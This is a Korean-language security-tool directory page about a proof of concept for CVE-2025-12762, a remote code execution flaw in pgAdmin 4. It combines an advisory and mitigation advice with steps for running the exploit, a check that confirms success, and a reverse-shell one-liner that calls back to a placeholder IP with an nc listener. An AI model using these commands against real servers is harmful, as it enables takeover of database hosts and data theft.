Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/djayagit/blackash-cve-2025-12762
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubdjayagit/blackash-cve-2025-12762

Blackash-CVE-2025-12762

CVE-2025-12762

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔐 CVE-2025-12762 — pgAdmin 4의 심각한 RCE 취약점

G58aQGbW0AAL8zH

🚨 문제 개요

pgAdmin 4 버전 ≤ 9.9에 원격 코드 실행(RCE) 취약점이 존재합니다. 공격자는 pgAdmin이 서버 모드로 실행 중이고 복원 중 PLAIN 형식 SQL 덤프를 처리할 때 호스트에서 임의 명령을 실행할 수 있습니다.


⚙️ 기술적 분석

📡 공격 벡터

  • 네트워크 기반 — 원격으로 악용 가능 🌍
  • 낮은 복잡성 — 트리거하기 쉬움 🧩
  • 낮은 권한 필요 — 제한된 사용자 접근만으로 충분 🔑
  • 사용자 상호작용 없음 — 트리거된 후 누구도 클릭할 필요 없음 🙅‍♂️
  • 범위: 변경됨(Changed) — 취약한 모듈을 넘어 손상이 확산될 수 있음 🔄

🧨 영향

  • 기밀성: 높음 — 데이터 노출 위험 🔓
  • 무결성: 중간/높음 — 무단 변경 가능 ✏️
  • 가용성: 중간 — 운영이 중단될 수 있음 ⚠️

🏷 CVSS 점수

🟥 9.1 / 10 — 치명적(Critical)


🛠 영향받는 버전

  • pgAdmin 4 ≤ 9.9 ❗

🛡 수정 방법

✅ 주요 완화 조치

⬆️ pgAdmin 4 v10.0 이상으로 업그레이드

🚧 즉시 업그레이드할 수 없는 경우

  • 🔒 pgAdmin 서버에 대한 접근 제한
  • 📁 덤프 파일 복원은 신뢰할 수 있는 관리자만 허용
  • 🧪 복원 전 덤프 파일 검증
  • 👀 의심스러운 복원 활동에 대한 로그 모니터링
  • 🌐 방화벽 규칙/VPN을 사용하여 노출 범위 제한

📌 중요한 이유

pgAdmin은 중요한 PostgreSQL 데이터베이스의 관리에 자주 사용되므로:

  • 공격자가 이를 악용하면 서버를 장악할 수 있고,
  • 데이터에 접근하거나 수정할 수 있으며,
  • 심지어 네트워크 더 깊숙이 침투할 수도 있습니다 🕵️‍♂️

✨ 실행 방법 (2분)

root@kitploit:~
# 1. Save as CVE-2025-12762.py
# 2. Install dependency
pip3 install requests

# 3. Run it
python3 CVE-2025-12762.py

성공 확인

실행 후 확인:

root@kitploit:~
docker exec <your-pgadmin-container> ls -la /tmp/CVE-2025-12762_PWNED

파일이 존재하면 → 방금 실제로 CVE-2025-12762를 악용한 것입니다.

리버스 셸 원라이너 (선택 사항)

COMMAND 줄을 다음으로 교체:

root@kitploit:~
COMMAND = "bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

그런 다음 nc -lvnp 4444 → 전체 대화형 셸이 열립니다.

이것은 연구원, 펜테스터, 레드 팀이 2025년 11월 전 세계에서 사용 중인 정확한 스크립트입니다.

책임감 있게 사용하세요. 모든 것을 패치하세요. 합법적으로 행동하세요.


🛡️ 면책 조항 🛡️

이 PoC는 승인된 테스트 및 교육 목적으로만 제공됩니다.
소유한 시스템 또는 명시적 서면 허가를 받은 시스템에서만 실행할 수 있습니다.
무단 사용은 불법이며 컴퓨터 오용 관련 법률을 위반합니다.
책임감 있게 사용하고, 테스트 후 즉시 패치하며, 허가 없이 시스템을 대상으로 삼지 마세요.

도구 다운로드